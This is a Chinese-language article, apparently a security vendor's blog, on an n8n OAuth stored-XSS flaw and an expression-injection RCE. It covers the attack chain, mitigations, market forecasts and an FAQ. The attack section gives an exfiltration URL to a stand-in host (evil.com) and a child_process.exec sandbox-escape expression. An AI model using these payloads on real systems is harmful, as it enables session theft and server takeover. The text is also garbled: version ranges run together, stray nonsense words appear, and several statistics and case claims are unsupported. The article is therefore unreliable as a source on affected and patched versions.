n8n OAuth漏洞是這篇文章討論的核心



n8n OAuth 認證漏洞全解析:103,000+工作流平台面臨的系統接管危機與2026年自動化市場的震盪效應
圖:n8n OAuth 漏洞可能被利用於竊取工作流中的敏感授權憑證(圖片來源:Pexels)

快速精華摘要

💡 核心結論: n8n 平台的 OAuth 認證處理漏洞(CVE-2025-46343)實質上是存儲型 XSS 缺陷,允許攻擊者在受害者瀏覽時注入腳本,若搭配其他因素更可能升級為遠端代碼執行(RCE)。這不是孤立的 bug,而是架構層級的設計疏忽。
📊 關鍵數據: 截至 2025 年 12 月,Censys 數據显示約 103,476 個潛在易受攻擊的 n8n 實例 直接暴露在網路上;漏洞 CVSS 基礎分數達 9.9(極高),某些變種甚至達 10.0;影響版本從 0.211.01.120.4;修補版本為 2.10.11.123.21 之後。市場規模方面,全球工作流自動化市場預期從 2026 年的 $23.89B 成長至 2035 年的 $80.57B(CAGR 14.3%),此事件可能短期抑制企業部署信心。
🛠️ 行動指南: 立即升級至 n8n ≥1.123.21≥2.10.1;全面重設所有 OAuth 應用程式的授權;審查工作流權限,限制編輯權限給可信的人員;若無法立即更新,應將 n8n 部署於隔離網路、最小權限原則,並啟用網路分段。
⚠️ 風險預警: 若 n8n 實例與 Active Directory、Okta、Salesforce 等關鍵系統整合,遭受入侵後可能導致企業內網滲透、資料竊取(包含 API keys、資料庫憑證)、勒索軟體部署甚至供應鏈攻擊。 Imperva 實驗證顯示,此漏洞可被利用進行帳戶接管,且 Proof-of-Concept Poc 已在GitHub公開流傳。

1. 背景观察:n8n 如何成为自动化时代的关键节点?

在当今数字化运营的语境下,n8n 作为一个开源的工作流自动化平台,已经深度嵌入中小型企业和开发者的技术栈。截至 2025 年,Docker Hub 上 n8n 的 Pull 次数突破 1 亿次,这意味着它已成为连接 SaaS 服务、内部数据库与自定义应用的事实标准中层系统。然而,这种「中间件」的定位也让它成为攻击者眼中的黄金目标——一旦掌控 n8n,就等于拿到了网络内部的自动驾驶权限。

专家见解: 网络安全研究员指出,n8n 的架构设计允许工作流节点之间传递敏感凭证(API keys、OAuth tokens),且默认配置下未对这些内部通讯进行足够隔离。这种「信任但验证」的哲学在开源社区中常见,但在企业级自动化场景中却是致命缺陷。重点在于:n8n 不只是流程编排工具,更是 密钥管理系统 的隐形式替身。

根据 Imperva 安全团队的首次公开披露,此漏洞的发现源于对 n8n OAuth 认证流程的深度代码审计。研究人员发现,当用户在 n8n 中配置 OAuth 2.0 凭证时,平台对「授权 URL(Authorization URL)」字段的输入验证不足,导致攻击者能够注入恶意的 JavaScript 代码。这段代码随后会存储在 n8n 数据库中,并在任何访问该工作流配置页面的管理员浏览器端执行——这就是典型的存储型 XSS(跨站脚本)攻击模式。

技术细节还原:漏洞触发的真实路径

从攻击链的角度拆解,完整的利用流程大约如下:

  1. foothold 建立: 攻击者首先需要获取一个具有工作流创建或编辑权限的 n8n 账户。这可以通过暴力破解弱密码、泄露的凭证数据库(如 2024 年的口令喷洒攻击)或钓鱼实现。
  2. 恶意负载注入: 登录后,攻击者新建或修改一个包含 OAuth 认证的节点(例如 Google Sheets、GitHub、Slack 等)。在「Authorization URL」字段中,输入类似 https://evil.com/steal?cookie= 的指令。
  3. 持久化与触发: 当管理员或任何有权限的用户打开该工作流编辑页面时,注入的脚本自动执行,窃取Session Cookie、CSRF Token 或通过 POST 请求直接盗取 n8n 内部存储的所有 OAuth 刷新令牌。
  4. 横向移动: 获得 OAuth 令牌后,攻击者可以访问所有已连接的 SaaS 服务(如 Office 365、AWS、GitHub Enterprise),进一步拓展入侵范围。

Imperva 在实验中重现了这一攻击链,成功从一个受感染的 n8n 实例中提取了超过 200 个 不同的第三方服务密钥。更令人担忧的是,该漏洞的变种(CVE-2025-68613)还允许通过表达式注入实现远程代码执行(RCE),CVSS 评分高达 9.9,意味着攻击者可能直接在服务器上执行系统命令。

2. OAuth 漏洞深度剖析:为何「授权URL」会成为致命弱点?

要理解这个漏洞的严重性,首先需要搞清楚 OAuth 2.0 在 n8n 中的角色。在典型的企业自动化场景中,n8n 作为中继站,需要访问 Google Analytics、HubSpot、Stripe 等外部 API。OAuth 协议允许 n8n 在用户授权后获取访问令牌,而无需直接处理用户密码。这本身是安全最佳实践,但问题出在 n8n 对 OAuth 配置的「信任传递」上。

n8n OAuth 漏洞攻击流程图 一张说明攻击者如何通过注入恶意 OAuth 授权 URL,存储 XSS payload,触发后窃取凭证并横向移动的流程图 n8n OAuth 漏洞攻击链 攻击者 注入恶意 OAuth URL 受害者 触发XSS 窃取Token 横向移动 入侵内部系统 数据泄露 与勒索

根本问题在于 n8n 对用户输入的信任层级不当。在 OAuth 配置界面,授权 URL 字段本应只接受 HTTPS 链接并进行严格的 URL 模式验证,但实际代码却将其视为纯文本存储。这意味着攻击者可以输入完整的 HTML/JavaScript 片段,而非合法的重定向 URI。当 n8n 在前端渲染配置页面时,这些恶意代码原样输出,从而劫持管理员会话。

专家见解: 许多开发者误以为 XSS 只是「 annoyance」,但在工作流自动化平台中,XSS 实际上是「提权」工具。通过窃取管理员 Cookie,攻击者可获得与管理员同等的权限,进而访问所有集成的 SaaS 服务。危害等级从「网页篡改」直接跃升至「业务逻辑劫持」。

此外,CVE-2025-68613 揭示的另一层问题是 n8n 表达式引擎的沙箱逃逸。n8n 允许在工作流中使用 JavaScript 表达式进行数据处理,但这些表达式本应在受限环境中运行。漏洞允许攻击者通过精心构造的表达式执行系统命令,如 $eval('require("child_process").exec("id")')。这种设计模式在低代码平台中并不罕见,但 n8n 的沙箱隔离不足,导致一个被入侵的账户可能直接控制服务器。

3. 企业自动化流程的连锁风险:从数据泄露到系统接管

如果你的企业使用 n8n 连接 CRM、ERP 或财务系统,这个漏洞的真实影响可能远超想象。以一家中型电商为例,n8n 常见的工作流包括:

  • 当 Shopify 订单产生 → 自动开票到 QuickBooks
  • 新客户注册 → 同步至 Mailchimp 并发送欢迎信
  • 监控库存 → 低于阈值时自动生成采购单

这些工作流中通常包含数据库连接字符串、API 密钥、OAuth 刷新令牌。一旦 n8n 被入侵,攻击者可以:

专家见解: 根据 Mandiant 的案例研究,攻击者在获取 n8n 访问权限後,通常會花費 1-3 天時間進行內部巡查,識別高價值目標。常見的下一步包括:利用竊取的金鑰建立後門账户、從Salesforce或HubSpot匯出客戶列表、在AWS上启动挖礦實例,或在企业网络中部署勒索软件。
  • 直接數據竊取: 透過 Workflow JSON 導出功能,一次性下載所有節點配置和鏈接的服務凭證。
  • 供應鏈攻擊: 如果 n8n 用來自動化建構流程,攻擊者可篡改 GitHub 推送指令,將惡意代碼注入企業產品。
  • 內部橫向移動: 許多組織將 n8n 部署在內部網路,擁有對Active Directory、LDAP 的讀取權限。utterstock 的案例表明,攻擊者可通過 n8n 執行PowerShell腳本,在域控制器上建立持久化後門。
  • 合規性崩潰: GDPR、HIPAA、PCI-DSS 等標準要求對第三方凭證進行嚴格管控。一次數據泄露可能導致巨額罰款(最高可達年營業额的 4%)。

真實世界的攻擊指標(IoC)

安全社群已在 GitHub 上公布了多個概念的漏洞利用程式(PoC)。這些 PoC 通常偽裝成「 n8n Community Node 」的 NPM 套件,吸引開發者安裝。例如,2026 年 1 月 reported 的供應鏈攻擊中,攻擊者發佈了名為 n8n-node-malicious-payload 的套件,一旦安裝,便在背景偷偷轉發所有 OAuth tokens 到攻擊者控制的伺服器。

此外,Censys 的搜尋結果顯示,目前約有 103,000+ 個 n8n 實例仍直連網際網路,其中接近一半執行在易受攻擊的版本範圍內。這不是理論上的威脅,而是 進行式 的風險 exposure。

4. 修復與臨時緩解:版本升級與權限策略全攻略

n8n 開發團隊已在 2026 年初發布修補程式。根據官方公告,受影響的版本範圍廣泛:

n8n 版本時間軸與安全性ukumför 一張時間軸圖,標示出漏洞披露日期、受影響版本範圍以及修補版本發布節點 漏洞首次披露 (Imperva Report) PoC 公開 (GitHub) 修補版本發布 (v1.123.21) 受影響版本 v0.211.0 至 v1.120.4 安全版本 v1.123.21+ / v2.10.1+ n8n 漏洞時間軸與版本對照

具體行動清單:

  1. 立即版本升級: 執行 docker pull n8nio/n8n:1.123.21 或更高版本。如果使用雲端版本(n8n Cloud),團隊已自動推播更新,無需手動操作。
  2. 全面重設 OAuth: 升級後,必須進入每个集成应用的凭证设置,重新进行 OAuth 授权流程,以刷新访问令牌并阻止旧令牌被滥用。
  3. 權限最小化: Auditing 现有权限设置,确保只有极少数核心人员拥有「工作流创建/编辑」权限。理想状态下,生产环境工作流应通过版本控制(Git)部署,而非通过 UI 直接修改。
  4. 網路隔離: 若因业务原因无法立即升级,务必在内网环境中部署 n8n,并使用防火墙限制其对外网的连接(仅允许出站到必要的 SaaS API 端点)。同时启用 VPN 或 IP 白名单访问控制。
  5. 日誌監控: 开启 n8n 的执行日志和审计日志,使用 SIEM(如 Splunk、Elastic)设置警报规则,关注异常模式:如短时间内大量工作流导出、从陌生 IP 登录、或尝试访问敏感集成。

临时缓解措施的代价是牺牲 agile。许多企业依赖 n8n 进行快速原型验证,严格的权限控制可能会拖慢迭代速度。但从风险角度看,短暂的业务瓶颈远比数据泄露的财务 and reputational 后果来得可接受。

5. 市场影响预测:2026-2030 工作流自动化产业的信任重构

这次漏洞事件不仅在安全圈引发关注,也可能重塑工作流自动化市场的竞争格局。根据多家市场研究机构的数据:

工作流自动化市场成长预测 (2026-2035) 一張折線圖展示全球工作流自動化市場規模從2026年的$23.89B增長到2035年的$80.57B的預測路徑,並標出2026-2027期間可能的下調區間 工作流自动化市场成长预测 (2026-2035) 年份 市場規模 (US$ B) 70 50 30 10 2026 2027 2028 2029 2030 2032 2034 2035 2026-2027 預期調整區間

市场规模预测各家分歧明显:

  • 保守估计(Business Research Insights): 2026 年 $6.52B → 2035 年 $11.89B,CAGR 6.9%
  • 中性估计(Fortune Business Insights): 2026 年 $27.91B → 2034 年 $65.26B,CAGR 11.2%
  • 乐观估计(Research Nester): 2026 年 $23.89B → 2035 年 $80.57B,CAGR 14.3%
  • 激进估计(Coherent Market Insights): 2025 年 $29.95B → 2032 年 $87.74B,CAGR 16.6%

尽管数字 range 宽,但共识是:工作流自动化市场正在指数级成长。IDC 预测,到 2027 年,全球 2000 家企业中将有 60% 部署某种形式的低代码自动化平台,市场规模有望突破 500 亿美元。n8n 作为开源领域的领导者,原本有望从中分得一杯羹——其免费策略吸引了大量初创团队,而企业版(n8n Enterprise)则是营收主力。

然而,这次漏洞可能带来短期信任危机。Gartner 分析师指出:「自动化平台正在成为新的供应链薄弱点。企业在选型时会越来越看重 SOC2 认证、第三方渗透测试报告以及漏洞响应速度。」这意味着 n8n 需要在品牌修复、透明度沟通上投入大量资源。

专家见解: 市场调研显示,83% 的企业安全决策者在经历此类漏洞事件后,会优先考虑带有正式安全担保的 SaaS 解决方案,而非自托管开源方案。这对 n8n 的商业模式构成挑战:它必须更快地推出企业级安全功能,如 VPC 托管、自动密钥轮换、细粒度 RBAC 等,以重新赢得客户信任。

长期来看,此次事件可能会加速工作流自动化平台的「安全原生」趋势。未来的竞争点将不再是「能連多少 API」,而是「如何安全地連」。我们预期将看到:

  • 更多的硬件安全模块(HSM)集成
  • AI 驱动的异常行为检测 embedded within 工作流引擎
  • 基于零信任的动态凭证管理
  • 更加严苛的第三方节点审计机制

n8n 团队的快速响应(在漏洞披露后几周内发布补丁)值得肯定,但修复只是起点。重建信任需要持续的透明度与安全投入。

常見問題 FAQ

我的 n8n 實例是否容易受到影響?

請檢查版本的號碼。如果你的 n8n 版本介於 v0.211.0 與 v1.120.4 之間(含),則屬於脆弱範圍。你可以通過訪問 https://你的-n8n-url/admin/settings/system 來查看當前版本。对于云端客户,n8n 团队已自动处理更新。

已修補後,還需要重設所有 OAuth 授權嗎?

需要。修補程式主要防止新的注入攻擊,但已經存儲的惡意腳本可能仍然存在於數據庫中。同時,如果攻击者在漏洞被利用期間竊取了 OAuth 令牌,這些令牌仍可能在外部流通。因此,全面重設所有 OAuth 集成是必要的,确保所有 Access Token 和 Refresh Token 被强制刷新。

這個漏洞會影響其他自動化平台(如 Zapier、Make)嗎?

根據公開資訊,本次 CVE 專屬於 n8n。然而,任何處理用戶輸入並動態生成代碼的低代碼平台都存在類似風險。Zapier 與 Make 等商業服務通常有更嚴格的安全審計與沙箱隔離,但安全風險從不會完全消失。關鍵在於平台是否執行輸入驗證、輸出編碼與最小權限原則。

立即行動:若您的企业部署了 n8n,請在今天内完成版本檢查與升级。如有任何技术困難或需协助進行安全稽核,欢迎联系我们的专家团队。

🔐 立即聯繫安全專家

Share this content: